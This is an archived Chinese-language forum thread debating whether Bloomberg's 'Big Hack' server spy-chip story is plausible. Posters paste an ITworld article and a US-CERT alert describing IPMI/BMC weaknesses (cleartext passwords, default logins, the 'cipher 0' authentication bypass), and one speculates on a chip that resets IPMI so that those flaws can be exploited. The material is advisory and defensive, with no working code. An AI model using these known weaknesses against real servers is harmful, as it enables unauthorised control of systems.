由买买提看人间百态

boards

本页内容为未名空间相应帖子的节选和存档,一周内的贴子最多显示50字,超过一周显示500字 访问原贴
Military版 - big hack到底是真是假,懂技术的聊聊
相关主题
Bloomberg 震撼报告: the big hack德國一大型出版集團宣布撤回64篇由中國學者撰寫的學術論文
救富士康的工人就是救我们自己的下一代,9·11”后美国男婴出生率一度下降英国汽车沉浮:中国买罗孚 印度买路虎
这个video很有意思,休斯敦BMC的Bad Project (转载)轉:[揭秘 Google Titan M 晶片: Pixel 3 的終極保鏢是如何煉成的?]
传销公司聘请5名权威法学专家论证:这不是传销Breast cancer 'linked to bra size'
李莉你有美国移民局来的信 (转载)我6天前提出用家用CPAP治疗的意见被北京专家采纳了
这王利民是混的最惨的高考状元吗? (转载)Cuomo 认为只有亚裔感染的理论依据是基于SARS1.0
BioMed Central 召回 41 篇 文章-全部来自中国 (转贴)日本再三挑衅, 已经连开三枪!!!
德10家学术周刊撤回多篇中国论文 评议报告造假加油!WSN们也会有春天-谈谈我的美国老婆
相关话题的讨论汇总
话题: ipmi话题: bmc话题: user话题: password话题: bmcs
进入Military版参与讨论
1 (共1页)
w********2
发帖数: 632
1
bmi ipmi都是正常remote network manager技术,难道那个小芯片可以开启ipmi的后门
? ipmi好像在bios下层,但ipmi是cpu集成的?还是bios集成的?
l*******s
发帖数: 83
2
听听老美的技术人员怎么说: https://risky.biz/RB517_feature/
w********2
发帖数: 632
3
这只是一面之词。
还想听听技术大拿们的意见。
d********m
发帖数: 3662
4
不懂,坐看专家科普
w********2
发帖数: 632
5
我过去看过报道说cpu那么小,也可能是有后门的,就像virtual machine一样。
所以彭博报道中的芯片大小不是问题关键。
a***e
发帖数: 27968
6
当然可能。但是芯片不是是个人就能做的。就水平而言,美帝第一
有菱镜门在那,没道理美国政府不通过各大公司下手。要是CPU插个后门啥都木有系

★ 发自iPhone App: ChinaWeb 1.1.4

【在 w********2 的大作中提到】
: bmi ipmi都是正常remote network manager技术,难道那个小芯片可以开启ipmi的后门
: ? ipmi好像在bios下层,但ipmi是cpu集成的?还是bios集成的?

k*******g
发帖数: 7321
7
操,把间谍芯片放到主板上,而且肉眼可见,尼玛,美帝人民这智商,基本上,美帝一
路向下了
h*********n
发帖数: 11319
8
就是要编得足够低智才能让足够多的暴民看懂,一起干死小黄人

【在 k*******g 的大作中提到】
: 操,把间谍芯片放到主板上,而且肉眼可见,尼玛,美帝人民这智商,基本上,美帝一
: 路向下了

w********2
发帖数: 632
9
呼唤高手
w********2
发帖数: 632
10
An Analysis of Image Filtering on WeChat Moments
https://citizenlab.ca/2018/08/cant-picture-this-an-analysis-of-image-
filtering-on-wechat-moments/
相关主题
这王利民是混的最惨的高考状元吗? (转载)德國一大型出版集團宣布撤回64篇由中國學者撰寫的學術論文
BioMed Central 召回 41 篇 文章-全部来自中国 (转贴)英国汽车沉浮:中国买罗孚 印度买路虎
德10家学术周刊撤回多篇中国论文 评议报告造假轉:[揭秘 Google Titan M 晶片: Pixel 3 的終極保鏢是如何煉成的?]
进入Military版参与讨论
M*P
发帖数: 6456
11
什么说吧,除非你觉得对手技术水平比你低很多级,否则硬件后门就是找死。因为太容
易发现了。

:bmi ipmi都是正常remote network manager技术,难道那个小芯片可以开启ipmi的后
门? ipmi好像在bios下层,但ipmi是cpu集成的?还是bios集成的?
s********i
发帖数: 17328
12
技术上肯定是可行的啦。想想CPU那么复杂的东西都会有bug,前一段那个Meltdown and
Spectre不就是么。。。这些东西都属于后门vulnerablilty,要用的时候就可以被
exploit。
s********i
发帖数: 17328
13
CPU那个Meltdown and Spectre多少年了?没那么容易发现的。当然不是说bloomberg说
的就是真的。

【在 M*P 的大作中提到】
: 什么说吧,除非你觉得对手技术水平比你低很多级,否则硬件后门就是找死。因为太容
: 易发现了。
:
: :bmi ipmi都是正常remote network manager技术,难道那个小芯片可以开启ipmi的后
: 门? ipmi好像在bios下层,但ipmi是cpu集成的?还是bios集成的?

w********2
发帖数: 632
14
AFTER MELTDOWN AND SPECTRE, ANOTHER SCARY CHIP FLAW EMERGES
https://www.wired.com/story/speculative-store-bypass-spectre-meltdown-
vulnerability/
G******g
发帖数: 2275
15
我不相信那个是bug

and

【在 s********i 的大作中提到】
: 技术上肯定是可行的啦。想想CPU那么复杂的东西都会有bug,前一段那个Meltdown and
: Spectre不就是么。。。这些东西都属于后门vulnerablilty,要用的时候就可以被
: exploit。

M*P
发帖数: 6456
16
meltdown是设计问题,而且是藏在复杂的CPU里面的。bloomburg这个是一个元件,放在
主板上,这两个差别太大了。

:CPU那个Meltdown and Spectre多少年了?没那么容易发现的。当然不是说bloomberg
说的就是真的。
:【 在 MHP (马后炮) 的大作中提到: 】
s********i
发帖数: 17328
17
这些东西都是一回事儿,一复杂就可以钻空子,硬件软件都一样,人为的也好,无意的
也好,难者不会,会者不难。熊猫烧香的作者初中毕业,高中都没考上。

bloomberg

【在 M*P 的大作中提到】
: meltdown是设计问题,而且是藏在复杂的CPU里面的。bloomburg这个是一个元件,放在
: 主板上,这两个差别太大了。
:
: :CPU那个Meltdown and Spectre多少年了?没那么容易发现的。当然不是说bloomberg
: 说的就是真的。
: :【 在 MHP (马后炮) 的大作中提到: 】

j*******n
发帖数: 10868
18
任何软硬件有bug是100%的,发现是时间问题,但Bloomberg那个说的是天顶星技术,如
果tg有那个技术,米帝早被超越了

【在 s********i 的大作中提到】
: 这些东西都是一回事儿,一复杂就可以钻空子,硬件软件都一样,人为的也好,无意的
: 也好,难者不会,会者不难。熊猫烧香的作者初中毕业,高中都没考上。
:
: bloomberg

M*P
发帖数: 6456
19
你这种大而化之的思维方式,可以跟bloomburg这记者一起混了。

:这些东西都是一回事儿,一复杂就可以钻空子,硬件软件都一样,人为的也好,无意
的也好,难者不会,会者不难。熊猫烧香的作者初中毕业,高中都没考上。
:【 在 MHP (马后炮) 的大作中提到: 】
w********2
发帖数: 632
20
你这种已经先认为彭博是假新闻的才是鲜明的五毛立场。

【在 M*P 的大作中提到】
: 你这种大而化之的思维方式,可以跟bloomburg这记者一起混了。
:
: :这些东西都是一回事儿,一复杂就可以钻空子,硬件软件都一样,人为的也好,无意
: 的也好,难者不会,会者不难。熊猫烧香的作者初中毕业,高中都没考上。
: :【 在 MHP (马后炮) 的大作中提到: 】

相关主题
Breast cancer 'linked to bra size'日本再三挑衅, 已经连开三枪!!!
我6天前提出用家用CPAP治疗的意见被北京专家采纳了加油!WSN们也会有春天-谈谈我的美国老婆
Cuomo 认为只有亚裔感染的理论依据是基于SARS1.0说到枪的事,想起半年前的break in
进入Military版参与讨论
w********2
发帖数: 632
21
IPMI: The most dangerous protocol you've never heard of
IPMI could be punching holes in your corporate defenses.

Paul F. Roberts By Paul F. Roberts
ITworld | AUGUST 19, 2013
MORE GOOD READS
Many servers expose insecure out-of-band management interfaces to the
Internet
Those 'invisible' servers could open your network to hackers
Despite patches, Supermicro's IPMI firmware is far from secure, researchers
say
screen shot 2018 09 21 at 10.43.22 am
DEALPOSTS
Apple's dropping Back To My Mac Remote Access. Here's an Alternative,...
You spend thousands or even hundreds of thousands of dollars to secure the
data stored on the critical databases and application servers your
organization relies on. But what if each of those systems secretly harbored
a powerful, hardware
ADVERTISEMENT
based back door that would give a remote attacker total control of the
system? And what if that backdoor wasn't planted by some shadowy hacker
group operating out of the former Soviet republics, but by the multi-billion
dollar Western company that sold you the server in the first place?
If that sounds fantastic, I've got one word...err...acronym for you: IPMI,
and its turning into the new four letter word in security. IPMI stands for
Intelligent Platform Management Interface. It's a powerful protocol that is
supported by many late model server hardware from major manufacturers like
Dell, HP, Oracle and Lenovo.
–– ADVERTISEMENT ––
At the 100,000-foot level, IPMI can be understood as technology that gives
administrators almost total control over remotely deployed servers. IPMI and
now-standard hardware called a Baseboard Management Controller (BMC) - let
remote administrators monitor the health of servers, deploy (or remove)
software, manage hardware peripherals like the keyboard and mouse, reboot
the system and update software on it.
You'd think with that kind of power, IPMI would be a fortress: secure
against remote hackers and malware based attacks. But you'd be wrong.
Instead, researchers who have looked at implementations of IPMI have found
just the contrary: that remotely exploitable vulnerabilities in IPMI
implementations from major vendors are widespread, potentially giving a
remote attacker total control over a vulnerable operating system. The most
recent revelation about IPMI insecurity came last week in Washington D.C. at
WOOT '13, the 7th annual USENIX Workshop on Offensive Technologies. (Get it
? WOOT!) In a presentation there, Anthony Bonkoski, Russ Bielawski and J.
Alex Halderman of the University of Michigan presented the findings of
research on a common IPMI implementation from the server OEM Supermicro.
They found that the IPMI firmware, developed by ATEN Technologies, contained
"numerous, textbook security flaws" that included buffer overflow
vulnerabilities, privilege escalation vulnerabilities and shell injection.
They then demonstrated an attack leveraging one of those: a buffer over&#
64258;ow in a web interface used to access the IPMI feature to remotely
obtain a root shell on the BMC.
The University of Michigan research is just the latest in a string of
worrying reports on issues around IPMI. Notably, the security researcher Dan
Farmer, working as part of a DARPA-funded research project, was among the
first to sound the alarm on IPMI, in a paper first published in January. (
The research was recently updated).
Farmer's analysis raised many of the same concerns as the University of
Michigan study. In it, Farmer identified a wide range of security flaws in
the firmware the runs the Baseboard Management Controller, which he
described as "a bloodsucking leech" attached to the motherboard of servers
that use IPMI.
In an e-mail, Farmer said the University of Michigan work confirmed what he
suspected about the IPMI protocol and, more pointedly, the BMC component.
BMCs were rife with exploitable vulnerabilities that had yet to be
discovered or explored, Farmer said. "I talked about the appearance of
really shoddy work on a visceral level in my own work - poorly written shell
scripts, bad architecture, just terrible security design," he told me in an
e-mail. "I suspect if they looked ...at other vendors there wouldn't be all
that much difference. Each time I look at these things another piece falls
off, it's amazing we've held it all together as long as we have."
[ Prepare to become a Certified Information Security Systems Professional
with this comprehensive online course from PluralSight. Now offering a 10-
day free trial! ]
Others have taken notice. HD Moore, the author of the Metasploit penetration
testing tool and the Chief Research Officer at the security firm Rapid7,
published a "Penetration Tester's Guide to IPMI and BMCs" in July that built
on Farmer's research, highlighting some of the major vulnerabilities in
IPMI and BMCs and providing tips to professional penetration testers about
how to exploit them - taking advantage of default username and passwords
that haven't been changed, or bypassing authentication or brute forcing
usernames and passwords using known vulnerabilities.
How to Gain a Competitive Talent Advantage: Start Now
SponsoredPost Sponsored by TriNet
How to Gain a Competitive Talent Advantage: Start Now
Here's how we can help you do what you do best—grow your business.
Farmer's work and Moore's "guide" to breaking IPMI and BMCs prompted the
Department of Homeland Security to issue an alert in late July about the
security of systems that use IPMI. "Attackers can easily identify and access
systems that run IPMI and are connected to the Internet," CERT warned. "It
is important to restrict IPMI access to specific management IP addresses
within an organization and preferably separated into a separate LAN segment."
In an e-mail, Moore told me that he has received numerous reports from
professional penetration testers working in the field about successful
exploits of systems using IPMI. "In almost all cases, they were able to use
the information and code provided to gain access to an important target of
their test," he wrote. That doesn't mean that IPMI and BMC hacks are being
used outside of controlled tests (or "in the wild,") but Moore thinks it is
likely that they will be eventually, if they haven't already. So what's a
company to do? As is often the case, the level of risk from IPMI devices "
depends" - in this the risk of attack due to IPMI depends on how an
organization's servers are managed. "Companies using dedicated servers from
public providers will be directly exposed to the most dangerous types of
attacks," Moore said. Other firms, managing their own hardware, may yet
leave IPMI enabled on internal servers, which can allow an intruder with
internal network access to gain access to critical systems., Moore warned.
Farmer has published a list of security best practices to use with systems
that support IPMI. They include "severely restricting" access to any BMC,
beefing up authentication requirements and isolating systems with a BMC and
supporting IPMI from being able to access the public Internet. (That would
seem to be a no-brainer, but the University of Michigan researchers found
more than 100,000 such servers that were reachable via public Internet
searches and scans.)
Moore echoes that advice. "The best way to mitigate IPMI is to disable it or
place the IPMI interface on a dedicated and physically isolated network,"
Moore wrote.
c****3
发帖数: 10787
22
如果是协议设计有漏洞,就要说出来具体怎么能被利用,怎么能放硬件后门,用程序模
拟也可以
上面这几点,一个都说不出,做不到,就是放屁
w********2
发帖数: 632
23
看来bloomberg记者没错,ipmi本身太不安全,那个附加的小芯片可能是自动启动ipmi
到初始状态,这样就很容易被局域网络外的人hack了。
c****3
发帖数: 10787
24
安全不是这么搞得
程序都会有安全漏洞的,不存在没有bug的程序。协议设计也可能有漏洞的。
但是,要说这个有漏洞,有后门,就得明确指出来哪里有问题,哪里能被利用。具体的
说不出来就是发屁。计算机科学不是写论文,靠瞎猜的,要具体化的。
说不出具体的哪里有问题,哪里有漏洞,就是安全的,从来都是这样干的。否则所有程
序没有安全的了,因为没有程序是无bug的

ipmi

【在 w********2 的大作中提到】
: 看来bloomberg记者没错,ipmi本身太不安全,那个附加的小芯片可能是自动启动ipmi
: 到初始状态,这样就很容易被局域网络外的人hack了。

w********2
发帖数: 632
25
因为一般的网络管理员知道ipmi有问题,会关掉ipmi。如果重启到初始状态,其实就是
ipmi开启,这样相关漏洞就可以被利用了,这个不容易被发现,因为只是开启ipmi,没
有更多功能,所以没啥可疑的,而且硬件上容易做到,就是一个类似于自动flash的装
置。

ipmi

【在 w********2 的大作中提到】
: 看来bloomberg记者没错,ipmi本身太不安全,那个附加的小芯片可能是自动启动ipmi
: 到初始状态,这样就很容易被局域网络外的人hack了。

w********2
发帖数: 632
26
你这种文科五毛就别来忽悠了,根本不懂技术。

【在 c****3 的大作中提到】
: 安全不是这么搞得
: 程序都会有安全漏洞的,不存在没有bug的程序。协议设计也可能有漏洞的。
: 但是,要说这个有漏洞,有后门,就得明确指出来哪里有问题,哪里能被利用。具体的
: 说不出来就是发屁。计算机科学不是写论文,靠瞎猜的,要具体化的。
: 说不出具体的哪里有问题,哪里有漏洞,就是安全的,从来都是这样干的。否则所有程
: 序没有安全的了,因为没有程序是无bug的
:
: ipmi

c****3
发帖数: 10787
27
你才是文科,CS屁都不懂

【在 w********2 的大作中提到】
: 你这种文科五毛就别来忽悠了,根本不懂技术。
w********2
发帖数: 632
28
爷我玩儿gopher的时候你还在上幼儿园。

【在 c****3 的大作中提到】
: 你才是文科,CS屁都不懂
c****3
发帖数: 10787
29
你这臭水平,连安全是怎么评估的都不知道

【在 w********2 的大作中提到】
: 爷我玩儿gopher的时候你还在上幼儿园。
w********2
发帖数: 632
30
被屏蔽了。
相关主题
看到本版言论我想到一个笑话救富士康的工人就是救我们自己的下一代,9·11”后美国男婴出生率一度下降
这次台湾大巴失火烧死陆客,真有可能是恐怖袭击这个video很有意思,休斯敦BMC的Bad Project (转载)
Bloomberg 震撼报告: the big hack传销公司聘请5名权威法学专家论证:这不是传销
进入Military版参与讨论
w********2
发帖数: 632
31
A Penetration Tester's Guide to IPMI and BMCs
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
w********2
发帖数: 632
32
Alert (TA13-207A)
Risks of Using the Intelligent Platform Management Interface (IPMI)
Original release date: July 26, 2013 | Last revised: October 07, 2016
Print Document
Tweet
Like Me
Share
Systems Affected
Any system connected to the internet running the Intelligent Platform
Management Interface (IPMI) may be affected. IPMI is resident on many server
platforms, and provides low-level access to a system that can override
operating system controls.
Overview
Attackers can easily identify and access systems that run IPMI and are
connected to the Internet. It is important to restrict IPMI access to
specific management IP addresses within an organization and preferably
separated into a separate LAN segment.
Description
What is the Intelligent Platform Management Interface (IPMI)?
IPMI is a low level interface specification that has been adopted by many
hardware vendors. It allows a system administrator to remotely manage
servers at the hardware level. IPMI runs on the Baseboard Management
Controller (BMC) and provides access to the BIOS, disks, and other hardware.
It also supports remote booting from a CD or through the network, and
monitoring of the server environment. The BMC itself also runs a limited
set of network services to facilitate management and communications amongst
systems.
What Is the Risk?
Attackers can use IPMI to essentially gain physical-level access to the
server. An attacker can reboot the system, install a new operating system,
or compromise data, bypassing any operating system controls. Some issues
identified by Dan Farmer:
Passwords for IPMI authentication are saved in clear text.
Knowledge of one IPMI password gives you the password for all computers in
the IPMI managed group.
Root access on an IPMI system grants complete control over hardware,
software, firmware on the system.
BMCs often run excess and older network services that may be vulnerable.
IPMI access may also grant remote console access to the system, resulting in
access to the BIOS.
There are few, if any, monitoring tools available to detect if the BMC is
compromised.
Certain types of traffic to and from the BMC are not encrypted.
Unclear documentation on how to sanitize IPMI passwords without destruction
of the motherboard.
Attackers can easily search and identify internet-connected target systems,
and IPMI is no exception.
Impact
An attacker with knowledge of IPMI can search for, and find, open management
interfaces. Many of these interfaces utilize default or no passwords, or
weak encryption. Further consequences depend on the type and use of the
compromised system. At the very least, an attacker can compromise
confidentiality, integrity, and availability of the server once gaining
access to the BMC.
Solution
Restrict IPMI to Internal Networks
Restrict IPMI traffic to trusted internal networks. Traffic from IPMI (
usually UDP port 623) should be restricted to a management VLAN segment with
strong network controls. Scan for IPMI usage outside of the trusted
network and monitor the trusted network for abnormal activity.
Utilize Strong Passwords
Devices running IPMI should have strong, unique passwords set for the IPMI
service. See US-CERT Security Tip ST04-002 and Password Security,
Protection, and Management for more information on password security.
Encrypt Traffic
Enable encryption on IPMI interfaces, if possible. Check your manufacturer
manual for details on how to set up encryption.
Require Authentication
"cipher 0" is an option enabled by default on many IPMI enabled devices that
allows authentication to be bypassed. Disable "cipher 0" to prevent
attackers from bypassing authentication and sending arbitrary IPMI commands.
Anonymous logins should also be disabled.
Sanitize Flash Memory at End of Life
Follow manufacturer recommendations for sanitizing passwords. If none
exists, destroy the flash chip, motherboard, or other areas the IPMI
password may be stored.
Identify Affected Products
Most server products
HP Integrated Lights Out
Dell DRAC
IBM Remote Supervisor Adapter
Vendor Information
Dell has provided the following information related to this Technical Alert:
https://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-
remote-access-cntrllr-6-ent-for-blade-srvr-v3.5
http://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-remote-access-cntrllr-7-v1.40.40
http://www.dell.com/support/Manuals/us/en/555/Product/integrated-dell-remote-access-cntrllr-6-for-monolithic-srvr-v1.95
References
A Penetration Tester's Guide to IPMI and BMCs
Dan Farmer's IPMI++ Security Best Practices
Revisions
July 26, 2013 - Initial Release
October 3, 2013 - Added Vendor Information
w********2
发帖数: 632
33
There are few, if any, monitoring tools available to detect if the BMC is
compromised.
w********2
发帖数: 632
34
bloomberg说的可能轻了,可能早已有server被hack了,但没相关软件就查不出来。
s******g
发帖数: 536
35
这都是利用协议漏洞远程进攻,跟在主板上插芯片是两码事。
如果共匪会后者,那贸易战都不用打了,美国可以直接投降了。

server

【在 w********2 的大作中提到】
: Alert (TA13-207A)
: Risks of Using the Intelligent Platform Management Interface (IPMI)
: Original release date: July 26, 2013 | Last revised: October 07, 2016
: Print Document
: Tweet
: Like Me
: Share
: Systems Affected
: Any system connected to the internet running the Intelligent Platform
: Management Interface (IPMI) may be affected. IPMI is resident on many server

c****3
发帖数: 10787
36
你贴这些out-of-date的东西没用
这个世界没有绝对安全的软件,明天可能windows或者ios就出安全漏洞。各种协议也是
一样。硬件Intel还刚刚出过CPU漏洞
所以都是在不停修补漏洞的。如果漏洞无法修补,就会建议关掉,或者干脆移除
说不出哪里有问题,就是安全的。
这就是现在的安全实践,你要是连这个都不知道,就是外行的捕风捉影,一看就是生物
之类文科来的。

【在 w********2 的大作中提到】
: A Penetration Tester's Guide to IPMI and BMCs
: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

S***s
发帖数: 104
37
他估计根本就不懂。按照fake news的逻辑,英特尔CPU的虫子都是被恶意植入的。

【在 c****3 的大作中提到】
: 你贴这些out-of-date的东西没用
: 这个世界没有绝对安全的软件,明天可能windows或者ios就出安全漏洞。各种协议也是
: 一样。硬件Intel还刚刚出过CPU漏洞
: 所以都是在不停修补漏洞的。如果漏洞无法修补,就会建议关掉,或者干脆移除
: 说不出哪里有问题,就是安全的。
: 这就是现在的安全实践,你要是连这个都不知道,就是外行的捕风捉影,一看就是生物
: 之类文科来的。

s********i
发帖数: 17328
38
我给你类比一下,不一定恰当,凑合着看吧,也一定程度上回答上面帖子的问题。比如
,某人做保险箱的,他给保险箱装了个暗锁(不X光发现不了),只有他有这把暗锁的
钥匙,他去把这个保险箱给大家装上了,接下来有这么几个事实,
1,保险箱一定会被盗吗?显然不是,因为你还有其他保安措施,比如,门卫啊,摄像
头,防盗门等等,大公司的保安措施齐全些,小公司个体户们可能就指着这保险箱呢。
2. 保险箱里一定是财物吗,显然不是,比如机密文件,哪天保险柜被这把暗锁打开了
(比如哪天你的其他保安措施也出现了漏洞),机密文件就会被人看到,看完后在给你
放回去锁好。如果你的其他安全措施不厉害,你发现不了机密文件其实已经不机密了。
3. 假如哪天你给保险箱照X光,发现这把暗锁了,但你无法证明他是否能被打开,因为
你没有钥匙,既然你无法证明这把暗锁能被打开,你是否就认为暗锁不存在呢?
4. 保险商制造商会一下子成为牛逼公司吗?显然不是,因为他能偷到的东西是有限的
,但他可能随时随地都在偷,积少成多,再说了,总比啥也偷不到强吧?否则按照你的
逻辑,小偷应该是天下最富的人了。
接下来你能怎么做,应该怎么做?当然是把有暗锁的保险箱换掉并质问保险箱生产商。

【在 j*******n 的大作中提到】
: 任何软硬件有bug是100%的,发现是时间问题,但Bloomberg那个说的是天顶星技术,如
: 果tg有那个技术,米帝早被超越了

j*******n
发帖数: 10868
39
我靠,无数人跟你说了无数此了,你还是不懂。。。你贴的这些软硬件漏洞,是100%
存在的,也是广大人民群众耳熟能详的。。。但是在电路板上插管吸血,这个是天顶星
技术,如果中帝掌握了,早在技术上把米帝干趴下了,那时候会是米帝处心积虑想偷中
帝的信息

【在 w********2 的大作中提到】
: There are few, if any, monitoring tools available to detect if the BMC is
: compromised.

j*******n
发帖数: 10868
40
完全不恰当。。。现在的问题是现有技术条件下这个暗锁造不出来,如果能造出来,天
朝的技术水平已经上天了,米帝会处心积虑偷天朝的技术
所以你说的一切就都是科幻了

【在 s********i 的大作中提到】
: 我给你类比一下,不一定恰当,凑合着看吧,也一定程度上回答上面帖子的问题。比如
: ,某人做保险箱的,他给保险箱装了个暗锁(不X光发现不了),只有他有这把暗锁的
: 钥匙,他去把这个保险箱给大家装上了,接下来有这么几个事实,
: 1,保险箱一定会被盗吗?显然不是,因为你还有其他保安措施,比如,门卫啊,摄像
: 头,防盗门等等,大公司的保安措施齐全些,小公司个体户们可能就指着这保险箱呢。
: 2. 保险箱里一定是财物吗,显然不是,比如机密文件,哪天保险柜被这把暗锁打开了
: (比如哪天你的其他保安措施也出现了漏洞),机密文件就会被人看到,看完后在给你
: 放回去锁好。如果你的其他安全措施不厉害,你发现不了机密文件其实已经不机密了。
: 3. 假如哪天你给保险箱照X光,发现这把暗锁了,但你无法证明他是否能被打开,因为
: 你没有钥匙,既然你无法证明这把暗锁能被打开,你是否就认为暗锁不存在呢?

相关主题
传销公司聘请5名权威法学专家论证:这不是传销BioMed Central 召回 41 篇 文章-全部来自中国 (转贴)
李莉你有美国移民局来的信 (转载)德10家学术周刊撤回多篇中国论文 评议报告造假
这王利民是混的最惨的高考状元吗? (转载)德國一大型出版集團宣布撤回64篇由中國學者撰寫的學術論文
进入Military版参与讨论
s*********2
发帖数: 1572
41
老将可能懂吗,老将只要能反华就行了,一边骂着土鳖芯片技术落后,一边又说土鳖能
hack情报,但又为了证明这不是啥高级货想法设法曲解。

【在 j*******n 的大作中提到】
: 我靠,无数人跟你说了无数此了,你还是不懂。。。你贴的这些软硬件漏洞,是100%
: 存在的,也是广大人民群众耳熟能详的。。。但是在电路板上插管吸血,这个是天顶星
: 技术,如果中帝掌握了,早在技术上把米帝干趴下了,那时候会是米帝处心积虑想偷中
: 帝的信息

j*******n
发帖数: 10868
42
我来类比一下吧,一定很恰当,你认真看看吧能不能理解。。。
Bloomberg说天朝在保险箱上装了个神奇的暗锁,大家的钱都被天朝控制了。。。然后
大家指出这个传说中神奇的暗锁只能存在于科幻中。。。你则顺着Bloomberg写科幻的
思路继续走下去,这个暗锁好神奇啊!

【在 s********i 的大作中提到】
: 我给你类比一下,不一定恰当,凑合着看吧,也一定程度上回答上面帖子的问题。比如
: ,某人做保险箱的,他给保险箱装了个暗锁(不X光发现不了),只有他有这把暗锁的
: 钥匙,他去把这个保险箱给大家装上了,接下来有这么几个事实,
: 1,保险箱一定会被盗吗?显然不是,因为你还有其他保安措施,比如,门卫啊,摄像
: 头,防盗门等等,大公司的保安措施齐全些,小公司个体户们可能就指着这保险箱呢。
: 2. 保险箱里一定是财物吗,显然不是,比如机密文件,哪天保险柜被这把暗锁打开了
: (比如哪天你的其他保安措施也出现了漏洞),机密文件就会被人看到,看完后在给你
: 放回去锁好。如果你的其他安全措施不厉害,你发现不了机密文件其实已经不机密了。
: 3. 假如哪天你给保险箱照X光,发现这把暗锁了,但你无法证明他是否能被打开,因为
: 你没有钥匙,既然你无法证明这把暗锁能被打开,你是否就认为暗锁不存在呢?

s********i
发帖数: 17328
43
我的类比和Bloomberg的claim没啥直接关系,我说很清楚了,暗锁存在,至于是不是超
级暗锁,那是量的问题,不是质的区别。比如一个大妈发现自己保险箱有个暗锁,她怎
么骂都不过分,尽管她对保险箱一窍不通。

【在 j*******n 的大作中提到】
: 我来类比一下吧,一定很恰当,你认真看看吧能不能理解。。。
: Bloomberg说天朝在保险箱上装了个神奇的暗锁,大家的钱都被天朝控制了。。。然后
: 大家指出这个传说中神奇的暗锁只能存在于科幻中。。。你则顺着Bloomberg写科幻的
: 思路继续走下去,这个暗锁好神奇啊!

s********i
发帖数: 17328
44
什么暗锁造不出来?CPU那么牛叉的东西不都给你造个Meltdown and Spectre进去?

【在 j*******n 的大作中提到】
: 完全不恰当。。。现在的问题是现有技术条件下这个暗锁造不出来,如果能造出来,天
: 朝的技术水平已经上天了,米帝会处心积虑偷天朝的技术
: 所以你说的一切就都是科幻了

s*******7
发帖数: 1302
45
那是cpu的设计者估计嵌在里面的, 不是黑客或者pcb厂商可以自作主张放进去的.
能一样么?

【在 s********i 的大作中提到】
: 什么暗锁造不出来?CPU那么牛叉的东西不都给你造个Meltdown and Spectre进去?
j*******n
发帖数: 10868
46
有黑客利用软硬件漏洞?那简直是100%的事,人民群众早就耳熟能详了,根本没有炒
作价值。。。政府主导的网络战?我觉得99%的机会有,苏修米帝中帝帝乃至弯弯,地
球人都知道。但炒作这个能打击天朝产业链吗?没有用的
所以Bloomberg要另辟蹊径

【在 s********i 的大作中提到】
: 我的类比和Bloomberg的claim没啥直接关系,我说很清楚了,暗锁存在,至于是不是超
: 级暗锁,那是量的问题,不是质的区别。比如一个大妈发现自己保险箱有个暗锁,她怎
: 么骂都不过分,尽管她对保险箱一窍不通。

j*******n
发帖数: 10868
47
芯片里面有漏洞,简直是一定的。。。但打击不了天朝的产业链啊,所以只能造电路板
里夹手雷的科幻了
退一步讲,能造cpu并在里面藏个meltdown的,还只有米帝,中帝要有这本事,毛衣战
也不用打了,米帝可以直接投降了

【在 s********i 的大作中提到】
: 什么暗锁造不出来?CPU那么牛叉的东西不都给你造个Meltdown and Spectre进去?
j*******n
发帖数: 10868
48
其实除了Bloomberg一家死鸭子嘴硬连发两贴外,没有任何一家主流媒体跟进深挖热炒
,就已经很说明问题了。。。这么hot的topic但凡有点影子,其他媒体没道理冷处理
w********2
发帖数: 632
49
因为一般的网络管理员知道ipmi有问题,会关掉ipmi。如果重启到初始状态,其实就是
ipmi开启,这样相关漏洞就可以被利用了,这个不容易被发现,因为只是开启ipmi,没
有更多功能,所以没啥可疑的,而且硬件上容易做到,就是一个类似于自动flash的装
置。

【在 c****3 的大作中提到】
: 你贴这些out-of-date的东西没用
: 这个世界没有绝对安全的软件,明天可能windows或者ios就出安全漏洞。各种协议也是
: 一样。硬件Intel还刚刚出过CPU漏洞
: 所以都是在不停修补漏洞的。如果漏洞无法修补,就会建议关掉,或者干脆移除
: 说不出哪里有问题,就是安全的。
: 这就是现在的安全实践,你要是连这个都不知道,就是外行的捕风捉影,一看就是生物
: 之类文科来的。

w********2
发帖数: 632
50
因为一般的网络管理员知道ipmi有问题,会关掉ipmi。如果重启到初始状态,其实就是
ipmi开启,这样相关漏洞就可以被利用了,这个不容易被发现,因为只是开启ipmi,没
有更多功能,所以没啥可疑的,而且硬件上容易做到,就是一个类似于自动flash的装
置。

【在 j*******n 的大作中提到】
: 我靠,无数人跟你说了无数此了,你还是不懂。。。你贴的这些软硬件漏洞,是100%
: 存在的,也是广大人民群众耳熟能详的。。。但是在电路板上插管吸血,这个是天顶星
: 技术,如果中帝掌握了,早在技术上把米帝干趴下了,那时候会是米帝处心积虑想偷中
: 帝的信息

相关主题
英国汽车沉浮:中国买罗孚 印度买路虎我6天前提出用家用CPAP治疗的意见被北京专家采纳了
轉:[揭秘 Google Titan M 晶片: Pixel 3 的終極保鏢是如何煉成的?]Cuomo 认为只有亚裔感染的理论依据是基于SARS1.0
Breast cancer 'linked to bra size'日本再三挑衅, 已经连开三枪!!!
进入Military版参与讨论
w********2
发帖数: 632
51
一群文科五毛,连爷我的技术可能假设都看不懂,还在这里yy。可笑到极点,如果这都
不懂,还反,基本可以判断是五毛,还是文科的。
w********2
发帖数: 632
52
如果要flash bmi,那就是一个jumper,再加上rom存一些activation command,可以做
的很小。
c****3
发帖数: 10787
53
和你说了,IPMI不够安全,大家早就知道了,各种补丁都已经加上了
你说有了各种补丁的,还不安全,就得拿出证据来。
安全评估就是这么工作的,没证据就是骗子,不会有人相信的

【在 w********2 的大作中提到】
: 因为一般的网络管理员知道ipmi有问题,会关掉ipmi。如果重启到初始状态,其实就是
: ipmi开启,这样相关漏洞就可以被利用了,这个不容易被发现,因为只是开启ipmi,没
: 有更多功能,所以没啥可疑的,而且硬件上容易做到,就是一个类似于自动flash的装
: 置。

w********2
发帖数: 632
54
你个文科五毛,看的懂爷我的技术假设吗?看不懂就别丢脸了。

【在 c****3 的大作中提到】
: 和你说了,IPMI不够安全,大家早就知道了,各种补丁都已经加上了
: 你说有了各种补丁的,还不安全,就得拿出证据来。
: 安全评估就是这么工作的,没证据就是骗子,不会有人相信的

c****3
发帖数: 10787
55
你这种生物文科就不要现眼计算机了

【在 w********2 的大作中提到】
